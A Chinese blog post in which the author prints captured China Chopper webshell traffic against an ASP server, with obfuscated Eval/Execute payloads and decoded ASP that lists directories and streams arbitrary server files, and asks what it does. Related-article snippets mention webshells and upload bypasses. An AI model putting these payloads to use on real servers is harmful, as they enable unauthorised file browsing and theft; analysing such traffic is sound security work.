java抓包asp_菜刀ASP 下载文件抓包

最新推荐文章于 2024-04-23 23:21:23 发布
最新推荐文章于 2024-04-23 23:21:23 发布
阅读量1.7w 收藏
点赞数
文章标签: java抓包asp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42608318/article/details/114966347
版权
这篇博客主要讨论了如何使用 ASP 进行文件下载,包括解析 ASP 代码以理解文件处理过程。博主通过分析一段 ASP 代码,解释了其遍历路径、读取文件并响应给客户端的逻辑。同时,也提到了在特定条件下,如下载大型文件或压缩包时可能遇到的问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

标签:

http://blog.csdn.net/webxscan     神龙

打开文件

Send: Return Code: 0x00000000

webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20692C632C723A53657420533D5365727665722E4372656174654F626A656374282241646F64622E53747265616D22293A4966204E6F7420457272205468656E3A5769746820533A2E4D6F64653D333A2E547970653D313A2E

4F70656E3A2E4C6F616446726F6D46696C65285265717565737428227A312229293A693D303A633D2E53697A653A723D313032343A5768696C6520693C633A526573706F6E73652E42696E6172795772697465202E526561642872293A526

573706F6E73652E466C7573683A693D692B723A57656E643A2E436C6F73653A53657420533D4E6F7468696E673A456E6420576974683A456C73653A526573706F6E73652E42696E617279577269746520224552524F523A2F2F2022264572

722E4465736372697074696F6E3A456E64204966"""")):Response.Write(""""|

Dim i,c,r

Set S=Server.CreateObject("Adodb.Stream")

If Not Err Then:With S

.Mode=3

.Type=1

.Open

.LoadFromFile(Request("z1"))

i=0

c=.Size

r=1024

While i

Response.BinaryWrite .Read(r)

Response.Flush

i=i+r

Wend

.Close

Set S=Nothing

End With

Else

Response.BinaryWrite "ERROR:// "&Err.Description

End If

这段ASP啥意思啊  感觉应该是遍历路径  但是和上次抓到的结果不一样啊

webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644

262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D6

1744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53

455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6

E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E57726974

6520462E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E61747472696

27574657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696564292663

6872283929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")):Response.Write(""""|

&z1=413A5C5C

A:\\

Dim RR

RR=bd(Request("z1"))

Function FD(dt)

FD=Year(dt)&"-"

If Len(Month(dt))=1 Then

FD = FD&"0"

End If

FD=FD&Month(dt)&"-"

If Len(Day(dt))=1 Then

FD=FD&"0"

End If

FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"

If Len(Second(dt))=1 Then

FD=FD&"0"

End If

FD=FD&Second(dt)

End Function

SET C=CreateObject("Scripting.FileSystemObject")

Set FO=C.GetFolder(""&RR&"")

If Err Then

Response.Write("ERROR:// "&Err.Description)

Err.Clear

Else

For Each F in FO.subfolders

Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)

Next

For Each L in FO.files

Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)

Next

End If

->|ERROR:// 路径未找到|

下载文件  大型文件   奇怪为什么我在下载压缩包之类的文件就不行了呢

webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20692C632C723A53657420533D5365727665722E4372656174654F626A656374282241646F64622E53747265616D22293A4966204E6F7420457272205468656E3A5769746820533A2E4D6F64653D333A2E547970653D313A2E

4F70656E3A2E4C6F616446726F6D46696C65285265717565737428227A312229293A693D303A633D2E53697A653A723D313032343A5768696C6520693C633A526573706F6E73652E42696E6172795772697465202E526561642872293A526

573706F6E73652E466C7573683A693D692B723A57656E643A2E436C6F73653A53657420533D4E6F7468696E673A456E6420576974683A456C73653A526573706F6E73652E42696E617279577269746520224552524F523A2F2F2022264572

722E4465736372697074696F6E3A456E64204966"""")):Response.Write(""""|

Dim i,c,r

Set S=Server.CreateObject("Adodb.Stream")

If Not Err Then

With S

.Mode=3

.Type=1

.Open

.LoadFromFile(Request("z1"))

i=0

c=.Size

r=1024

While i

Response.BinaryWrite .Read(r)

Response.Flush

i=i+r

Wend

.Close

Set S=Nothing

End With

Else

Response.BinaryWrite "ERROR:// "&Err.Description

End If

标签:

Ramaswamy
关注
Java代码审计之文件上传漏洞详解
悦分享
01-23 637
文件长传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马、病毒、恶意脚本或这Webshell等。文件上传漏洞条件上传的文件能被Web服务器当做脚本来执行我们能够访问到上传文件的路径服务器上传文件命名规则第一种:上传文件名和服务器命名一致第二种:上传文件名和服务器命名不一致(随机、时间日期命名等),但是后缀一致第三种:上传文件名和服务器命名不一致(随机、时间日期命名等),后缀也不一致漏洞成因。
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1976
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
httpclient java 访问 Asp 页面
ply316的博客
09-12 179
自己做的一个页面访问哦!如有什么不足请多提提意见。 以下是Java类 import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import org.apache.commons.htt...
asp 的 Request对象
weixin_34318956的博客
04-14 179
如何用Request对象获得机器的环境参数 Reques对象能够保存从浏览器的客户端发送到服务器的所有信息,这当中有一部分是客户端的环境信息,通过Reques对象就可以读取这些信息,从而就能够得知客户端的环境。 ServerVariables 集合有哪些常用参数? 要用Reques对象来读取客户端的环境参数,就要使用到ServerVariables 集合对象来保存环境变量。 ...
认清ASP里的Request("XXX")
鱼的天堂与地狱
01-24 1873
以前写ASP总是很懒,喜欢直接用Request("XXX")获取提交数据.并且以为这样是直接获取FORM和QUERYSTRING里的数据.可是有次弄一个页面时.突然发现获取到的数据竟然不是想要的数据.查看了大半天的代码却也发不了哪里有错.怪事.过后.静下来想了一次突然想起自己曾用JS脚本写了COOKIES标记.会不会REQUEST时是获取了这个COOKIES标记??于是查看脚本代码.突然发现Req
php 判断来源 微信客户端_常见WebShell客户端的流量特征及检测思路
weixin_33143629的博客
01-04 2586
原创:合天智汇01概述开始之前先明确什么是webshell客户端?先问个问题,什么是客户端,什么是服务端?很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果已经种了后门,用于连接后门的程序是要求被服务的,比如执行个ps,目的是为了得到后门所在主机的进程列表,是“被服务“的,所以称之为客户端。本文将在后续介绍一系列有关webshell客户端的流量监测手法。WebShel...
java jsoup 爬虫爬asp.net网站遇到_doPostBack不能获取翻页数据解决办法
weixin_39477597的博客
03-07 2299
最近由于业务需求写了一个爬虫,但是由于asp.net中的翻页数据都是用_doPostBack表单提交的,只能获取到第一页的数据,几经周折找到了如下的解决办法: //要扒取的网页的地址 String url = "http://nmgs.china12366.org/Search.aspx?type=3&text=%E6%97%B6%E9%97%B4"; ...
文件上传漏洞-upload-labs完全使用burpsuite进行抓包处理
weixin_46248422的博客
07-01 2607
大多数网站都有文件上传的接口,但如果在后台开发时并没有对上传的文件进行安全考虑或采用了有缺陷的措施,导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意文件,从而通过该恶意文件的访问来控制整个后台 1.客户端绕过:js检查 首先观察到提示只允许上传图片文件,那么前端的查看代码,当页面发生改变时,会调用这个checkFileExt函数来检查上传的是不是图片,我们只需要在前端将checkFileExt函数删除,就能上传一个一个非图片文件。 通过burpsuit抓包进行绕过: 2...
文件包含漏洞和上传漏洞
sunnygao的博客
09-29 3305
文章目录文件包含漏洞PHP文件包含漏洞远程文件包含漏洞截断包含JSP文件包含文件包含漏洞预防文件上传漏洞解析漏洞服务端检测目录验证文件内容检测预防方法一句话木马 sql注入,有sql盲注,基于布尔的注入,还有基于时间的注入,union的使用条件 字段数保持一致,可以用其他数据凑数补上。 文件包含漏洞 PHP文件包含漏洞 ​ 文件包含:共用函数写到单个文件中,然后多次调用, ​ 文件包含漏洞:包含的文件可以被替换成恶意文件。 PHP提供了四个文件包含函数,分别是include() 找不到被包含的文件只会产生警
WEB攻防-ASP中间件IIS文件上传解析安全漏洞
weixin_45534587的博客
04-23 353
通过抓包文件加上1.asp;.的前缀,使他保存的时候可以被执行。当加上前缀上传成功后,这时候就触发了IIS6.0默认不解析。号后面的内容,可以看到文件被当作asp解析了。IIS6.0默认不解析。如果不修改前缀上传就是正常访问图片。写一个木马文件,并改为jpg后缀。文件夹下的文件当成asp解析。我们用菜刀就可以链接成功了。解析,相当于分号截断。
ExecuteFunction
安徽锐锋科技-沐雨潇竹
08-20 1105
函数executeFunction从C函数中调用内置的SimTalk方法,例如setSeedTable,sin,version等。 参数 参数char * FunctionName指定内置方法的名称。 参数int argc指定参数的数量。 参数UF_Value * args指定参数。 该方法的结果是返回值。 Add-Ins Reference Help > Inter-Process Communication Interfaces > C > Structure of the
asp 一句话小马_木马分析一句话木马制作和“菜刀”的使用
weixin_39528525的博客
12-29 1万+
1.什么是webshellWeb 即 web服务也就是网站Shell 即人机交互界面,取得对服务器/电脑某种程度上的操作权限。Webshell即拿到网站服务器的权限(shell)比如我在cmd下的命令操作就可以叫get shell ,获得电脑操作权限。2.怎么才能get shell使用木马可以帮我们拿到shell,达到控制网站服务器的目的,也称为网站的后门。常见的木马:asp一句话...
常见WebShell客户端的流量特征及检测思路
热门推荐
蚁景网安学院
05-28 1万+
01概述开始之前先明确什么是webshell客户端?先问个问题,什么是客户端,什么是服务端?很简单,提供服务的就是服务端,要求被服务的就是客户端。那么回到我们的场景中,如果已经种了后门,...
plusmytag_js.php,木马上传
weixin_39630735的博客
03-09 9411
攻击payload1:a=Execute++++++++++++++++++++++++++++++("++++++++++++++++++++++++++++++Execute++++++++++++++++++++++++++++++(""++++++++++:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid...
基于CST软件的三维超材料能带计算及其应用
04-28
内容概要:本文介绍了如何利用CST软件进行三维超材料的能带计算。首先概述了三维超材料的独特性质及其广泛应用前景,接着简要介绍了CST软件的功能特点。随后详细阐述了能带计算的具体步骤,包括模型建立、材料参数设置、网格划分与求解设置以及最终的计算与结果分析。最后给出了一段Python代码示例,展示了如何处理CST输出的数据并绘制能带图。文章强调了计算机模拟技术对于深入了解超材料电子结构和物理性质的重要性。 适合人群:从事材料科学研究的专业人士,尤其是对三维超材料和电磁场模拟感兴趣的科研工作者和技术人员。 使用场景及目标:适用于希望借助CST软件开展三维超材料能带计算的研究项目,旨在提高对超材料的理解,推动相关领域的技术创新和发展。 其他说明:文中提供的Python代码仅为示例,在实际操作时可根据具体情况进行调整优化。同时,掌握CST软件的基本操作和电磁理论基础知识有助于更好地理解和应用本文内容。
基于FPGA的永磁同步伺服系统设计:电流环及矢量控制实现
最新发布
04-28
内容概要:本文详细介绍了基于FPGA的永磁同步伺服系统的矢量控制设计,涵盖了从电流环到速度环的关键模块实现。具体包括Clarke和Park变换、PI调节器、AD7606采样、正交编码器反馈以及SVPWM生成等部分。文中提供了详细的Verilog代码片段,展示了各个模块的具体实现方法和技术细节。特别强调了定点数处理、时序设计和跨时钟域处理等方面的技术挑战及其解决方案。 适合人群:具备一定FPGA开发经验和电机控制基础知识的研发人员。 使用场景及目标:适用于希望深入了解FPGA在电机控制应用中的具体实现方式,特别是矢量控制和电流环设计的专业人士。目标是掌握FPGA平台下高效、低延迟的电机控制系统设计方法。 阅读建议:由于涉及大量具体的Verilog代码和硬件设计细节,建议读者在阅读过程中结合实际项目进行实验和调试,以便更好地理解和掌握相关技术。
飞机大战:从运动方程到战斗系统的全链路设计解析
04-28
经典飞机大战游戏是理解实时交互系统设计的绝佳载体。本文将深入剖析现代空战游戏的核心模块,涵盖刚体运动学、弹道轨迹优化、碰撞检测算法等关键技术,揭示二维游戏背后复杂的三维数学建模过程。
scratch少儿编程逻辑思维游戏源码-冰塔.zip
04-28
scratch少儿编程逻辑思维游戏源码-冰塔.zip
scratch少儿编程逻辑思维游戏源码-弹跳(4).zip
04-28
scratch少儿编程逻辑思维游戏源码-弹跳(4).zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值